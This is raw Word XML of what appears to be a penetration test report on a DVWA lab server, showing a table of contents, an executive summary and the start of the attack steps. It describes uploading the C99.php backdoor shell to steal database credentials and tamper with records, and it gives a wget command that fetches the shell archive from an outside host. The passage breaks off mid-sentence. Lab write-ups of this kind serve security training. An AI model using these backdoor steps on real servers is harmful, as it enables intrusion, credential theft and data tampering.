            <w:r w:rsidR="000A25AE" w:rsidRPr="00B44FF1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Exploiting DVWA with the C99 Shell</w:t>
            </w:r>
            <w:r w:rsidR="000A25AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="000A25AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="000A25AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc41839634 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="000A25AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="000A25AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="000A25AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
            <w:r w:rsidR="000A25AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="00463FDD" w14:textId="3861BB29" w:rsidR="000A25AE" w:rsidRDefault="00474588">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:lang w:val="en-AU" w:eastAsia="en-AU"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc41839635" w:history="1">
            <w:r w:rsidR="000A25AE" w:rsidRPr="00B44FF1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Grabbing the Database Credentials</w:t>
            </w:r>
            <w:r w:rsidR="000A25AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="000A25AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="000A25AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc41839635 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="000A25AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="000A25AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="000A25AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
            <w:r w:rsidR="000A25AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="220CAF12" w14:textId="763659F3" w:rsidR="000A25AE" w:rsidRDefault="00474588">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:lang w:val="en-AU" w:eastAsia="en-AU"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc41839636" w:history="1">
            <w:r w:rsidR="000A25AE" w:rsidRPr="00B44FF1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Tampering with the Database</w:t>
            </w:r>
            <w:r w:rsidR="000A25AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="000A25AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="000A25AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc41839636 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="000A25AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="000A25AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="000A25AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>15</w:t>
            </w:r>
            <w:r w:rsidR="000A25AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5BA4F857" w14:textId="0E016D07" w:rsidR="000A25AE" w:rsidRDefault="00474588">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-AU"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc41839637" w:history="1">
            <w:r w:rsidR="000A25AE" w:rsidRPr="00B44FF1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Confirming the Attack on DVWA</w:t>
            </w:r>
            <w:r w:rsidR="000A25AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="000A25AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="000A25AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc41839637 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="000A25AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="000A25AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="000A25AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>19</w:t>
            </w:r>
            <w:r w:rsidR="000A25AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="62D80FAC" w14:textId="62C3A686" w:rsidR="000A25AE" w:rsidRDefault="00474588">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-AU"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc41839638" w:history="1">
            <w:r w:rsidR="000A25AE" w:rsidRPr="00B44FF1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Conclusion</w:t>
            </w:r>
            <w:r w:rsidR="000A25AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="000A25AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="000A25AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc41839638 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="000A25AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="000A25AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="000A25AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>21</w:t>
            </w:r>
            <w:r w:rsidR="000A25AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="15DE332C" w14:textId="1F2CEDF6" w:rsidR="000A25AE" w:rsidRDefault="00474588">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-AU"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc41839639" w:history="1">
            <w:r w:rsidR="000A25AE" w:rsidRPr="00B44FF1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Recommendations</w:t>
            </w:r>
            <w:r w:rsidR="000A25AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="000A25AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="000A25AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc41839639 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="000A25AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="000A25AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="000A25AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>22</w:t>
            </w:r>
            <w:r w:rsidR="000A25AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="085DD1DD" w14:textId="25807815" w:rsidR="000A25AE" w:rsidRDefault="00474588">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-AU"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc41839640" w:history="1">
            <w:r w:rsidR="000A25AE" w:rsidRPr="00B44FF1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Risk Rating</w:t>
            </w:r>
            <w:r w:rsidR="000A25AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="000A25AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="000A25AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc41839640 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="000A25AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="000A25AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="000A25AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>23</w:t>
            </w:r>
            <w:r w:rsidR="000A25AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1248CB94" w14:textId="5C0BC40C" w:rsidR="000A25AE" w:rsidRDefault="00474588">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-AU"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc41839641" w:history="1">
            <w:r w:rsidR="000A25AE" w:rsidRPr="00B44FF1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>References</w:t>
            </w:r>
            <w:r w:rsidR="000A25AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="000A25AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="000A25AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc41839641 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="000A25AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="000A25AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="000A25AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>24</w:t>
            </w:r>
            <w:r w:rsidR="000A25AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="35C502AD" w14:textId="0DB69A66" w:rsidR="0028153C" w:rsidRDefault="0028153C" w:rsidP="0028153C">
          <w:r>
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:noProof/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="62046D34" w14:textId="76B14DA6" w:rsidR="0028153C" w:rsidRDefault="0028153C" w:rsidP="0028153C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="27BC3D13" w14:textId="323314F5" w:rsidR="00605856" w:rsidRDefault="0028153C" w:rsidP="009F7473">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc41839624"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Executive Summary</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="5ABA8341" w14:textId="77777777" w:rsidR="009F7473" w:rsidRPr="009F7473" w:rsidRDefault="009F7473" w:rsidP="009F7473"/>
    <w:p w14:paraId="741572F4" w14:textId="76DD59A8" w:rsidR="00BA1152" w:rsidRDefault="00BC2B63" w:rsidP="0028153C">
      <w:r>
        <w:t>Websters contracted Wilson</w:t>
      </w:r>
      <w:r w:rsidR="00605856">
        <w:t xml:space="preserve"> Security</w:t>
      </w:r>
      <w:r w:rsidR="001A4F98">
        <w:t xml:space="preserve"> to conduct a penetration test to analyse how </w:t>
      </w:r>
      <w:r w:rsidR="007B55C0">
        <w:t xml:space="preserve">much </w:t>
      </w:r>
      <w:r w:rsidR="00A34A40">
        <w:t xml:space="preserve">risk is there that the organization </w:t>
      </w:r>
      <w:r w:rsidR="00BB6CB9">
        <w:t xml:space="preserve">can be </w:t>
      </w:r>
      <w:r w:rsidR="00A34A40">
        <w:t>attacked</w:t>
      </w:r>
      <w:r w:rsidR="00BA1152">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00A34A40">
        <w:t>Wilson</w:t>
      </w:r>
      <w:r w:rsidR="00BA1152">
        <w:t xml:space="preserve"> Security </w:t>
      </w:r>
      <w:r w:rsidR="0089746A">
        <w:t>replicated the wa</w:t>
      </w:r>
      <w:r w:rsidR="00F8791D">
        <w:t xml:space="preserve">y an attacker would hack Websters for the purpose of this penetration </w:t>
      </w:r>
      <w:r w:rsidR="00C63215">
        <w:t xml:space="preserve">test and attained the main goal: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F509F1" w14:textId="77777777" w:rsidR="00543A93" w:rsidRDefault="00543A93" w:rsidP="00543A93">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>To determine if Websters would lose complete control over their DVWA database if an attacker had access to the web server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D1A27E" w14:textId="5D3C1BC7" w:rsidR="00605856" w:rsidRPr="00605856" w:rsidRDefault="00301E09" w:rsidP="0028153C">
      <w:r>
        <w:t>Wilson Security performed the following attacks in</w:t>
      </w:r>
      <w:r w:rsidR="00CE57F8">
        <w:t xml:space="preserve"> a manner with resources, an average person </w:t>
      </w:r>
      <w:r w:rsidR="009F015D">
        <w:t>will</w:t>
      </w:r>
      <w:r w:rsidR="00BB4E17">
        <w:t xml:space="preserve"> have</w:t>
      </w:r>
      <w:r w:rsidR="0029078F">
        <w:t xml:space="preserve">. Websters provided </w:t>
      </w:r>
      <w:r w:rsidR="006444B7">
        <w:t>certain credentials and IP Addresses to Wilson Security</w:t>
      </w:r>
      <w:r w:rsidR="00F4585E">
        <w:t xml:space="preserve">, using this information, we were able to change the security level of </w:t>
      </w:r>
      <w:r w:rsidR="008F78AA">
        <w:t xml:space="preserve">their web server. We were </w:t>
      </w:r>
      <w:r w:rsidR="00D134BB">
        <w:t>also able</w:t>
      </w:r>
      <w:r w:rsidR="008F78AA">
        <w:t xml:space="preserve"> to gather </w:t>
      </w:r>
      <w:r w:rsidR="00E353CE">
        <w:t>the database password using a malicious PHP script and alter their database records</w:t>
      </w:r>
      <w:r w:rsidR="00722C56">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00BB4E17">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00605856">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="025F7964" w14:textId="14F81A27" w:rsidR="00BA1152" w:rsidRDefault="0028153C" w:rsidP="000B2355">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc41839625"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Summary of Results</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="0D0FFFD2" w14:textId="77777777" w:rsidR="009F7473" w:rsidRPr="009F7473" w:rsidRDefault="009F7473" w:rsidP="009F7473"/>
    <w:p w14:paraId="46E1A4D2" w14:textId="2FCB5BFA" w:rsidR="00BA1152" w:rsidRDefault="00B74373" w:rsidP="00B13DA6">
      <w:r>
        <w:t xml:space="preserve">Firstly, we downloaded and </w:t>
      </w:r>
      <w:r w:rsidR="004324B4">
        <w:t xml:space="preserve">configured the c99 shell file, then we logged in as the admin into the </w:t>
      </w:r>
      <w:r w:rsidR="00A35F94">
        <w:t>DVWA server of Websters and change</w:t>
      </w:r>
      <w:r w:rsidR="00681CBF">
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidR="00A35F94">
        <w:t xml:space="preserve"> the security level to low. Further, we </w:t>
      </w:r>
      <w:r w:rsidR="00171B04">
        <w:t xml:space="preserve">uploaded and unzipped the c99 shell file and then executed it. We were able to grab the </w:t>
      </w:r>
      <w:r w:rsidR="00AE442F">
        <w:t>database password and use it to view tables and their respective records. Additionally, we were able to tamper with</w:t>
      </w:r>
      <w:r w:rsidR="00505643">
        <w:t xml:space="preserve"> their </w:t>
      </w:r>
      <w:r w:rsidR="00AE442F">
        <w:t>data</w:t>
      </w:r>
      <w:r w:rsidR="00505643">
        <w:t>base</w:t>
      </w:r>
      <w:r w:rsidR="00B13DA6">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00697356">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00244F1F">
        <w:t>Then we logged int</w:t>
      </w:r>
      <w:r w:rsidR="0038323A">
        <w:t>o web server from one of their machines to confirm the attacks. The attack was successful.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0366EE1B" w14:textId="3E842C41" w:rsidR="0028153C" w:rsidRPr="00BA1152" w:rsidRDefault="00BA1152" w:rsidP="0028153C">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B687E22" w14:textId="175B1880" w:rsidR="0008250A" w:rsidRPr="0008250A" w:rsidRDefault="0028153C" w:rsidP="0008250A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc41839626"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Attack </w:t>
      </w:r>
      <w:r w:rsidR="00BA1152">
        <w:t>Description</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
      <w:r w:rsidR="00BA1152">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="012F7147" w14:textId="7E48EB90" w:rsidR="0028153C" w:rsidRDefault="004B4AFF" w:rsidP="0028153C">
      <w:r>
        <w:t>Websters provided Wilson Security with IP Addresses for the motive of this penetration test.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AE24368" w14:textId="1A45DDE3" w:rsidR="00503757" w:rsidRPr="00976B56" w:rsidRDefault="0028451B" w:rsidP="0028153C">
      <w:r>
        <w:t>For this penetration test, we decided to use C99.php backdoor shell to exploit the web server of Websters. C99.php is basically a type of PHP malware which when uploaded to a vulnerable web application, will supply the attacker with a user interface to exploit the web server.  The attacker can then act as the account which is running PHP and execute commands on the web server. The C99 shell can be used by the attacker for browsing files and the system, view files, delete files, edit files, move files, upload files as well as authorizes the attacker to change the permissions as the web server.</w:t>
      </w:r>
      <w:r w:rsidR="006949FF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-1034337205"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="006949FF">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="006949FF">
            <w:instrText xml:space="preserve"> CITATION Jus01 \l 3081 </w:instrText>
          </w:r>
          <w:r w:rsidR="006949FF">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00474588">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>(Keane, 2001)</w:t>
          </w:r>
          <w:r w:rsidR="006949FF">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
    </w:p>
    <w:p w14:paraId="5F8834EA" w14:textId="516CA45F" w:rsidR="0028451B" w:rsidRDefault="0054548C" w:rsidP="0028451B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc41839627"/>
      <w:r>
        <w:t xml:space="preserve">Downloading </w:t>
      </w:r>
      <w:r w:rsidR="0027516E">
        <w:t>F</w:t>
      </w:r>
      <w:r w:rsidR="004B4AFF">
        <w:t>iles for c99.php</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="75609494" w14:textId="2F8C21C5" w:rsidR="0028451B" w:rsidRDefault="0028451B" w:rsidP="0028451B">
      <w:r>
        <w:t xml:space="preserve">Using the </w:t>
      </w:r>
      <w:r w:rsidRPr="0028451B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>cd /root/backdoor/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>command</w:t>
      </w:r>
      <w:r w:rsidR="00146A6F">
        <w:t xml:space="preserve">, we </w:t>
      </w:r>
      <w:r w:rsidR="00BA4A82">
        <w:t>changed our location to</w:t>
      </w:r>
      <w:r w:rsidR="00146A6F">
        <w:t xml:space="preserve"> the </w:t>
      </w:r>
      <w:r w:rsidR="00146A6F" w:rsidRPr="00146A6F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>/root/backdoor</w:t>
      </w:r>
      <w:r w:rsidR="00146A6F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00146A6F">
        <w:t xml:space="preserve">directory </w:t>
      </w:r>
      <w:r w:rsidR="00025910">
        <w:t>which is where we</w:t>
      </w:r>
      <w:r w:rsidR="00E06877">
        <w:t xml:space="preserve"> downloaded the rar files for C99.php.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="213096BA" w14:textId="50F4C0F4" w:rsidR="006879AB" w:rsidRPr="001440AD" w:rsidRDefault="008A536F" w:rsidP="0028451B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251734016" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="57F56A1B" wp14:editId="6D7F91CF">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:align>right</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1017271</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5915025" cy="495300"/>
                <wp:effectExtent l="19050" t="19050" r="28575" b="19050"/>
                <wp:wrapNone/>
                <wp:docPr id="3" name="Flowchart: Alternate Process 3"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5915025" cy="495300"/>
                        </a:xfrm>
                        <a:prstGeom prst="flowChartAlternateProcess">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:noFill/>
                        <a:ln w="2857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9D802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margin-left:414.55pt;margin-top:80.1pt;width:465.75pt;height:39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" filled="f" strokecolor="yellow" strokeweight="2.25pt">
                <v:stroke joinstyle="round"/>
                <w10:wrap anchorx="margin"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="006879AB">
        <w:t xml:space="preserve">Further, using </w:t>
      </w:r>
      <w:r w:rsidR="00B05008">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00BC49A6" w:rsidRPr="00BC49A6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">wget </w:t>
      </w:r>
      <w:hyperlink r:id="rId15" w:history="1">
        <w:r w:rsidR="00BC49A6" w:rsidRPr="00383278">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:i/>
            <w:iCs/>
          </w:rPr>
          <w:t>http://www.computersecuritystudent.com/SECURITY_TOOLS/DVWA/DVWAv107/lesson14/stuff.rar</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00B05008">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B05008">
        <w:t>command</w:t>
      </w:r>
      <w:r w:rsidR="00DA008D">
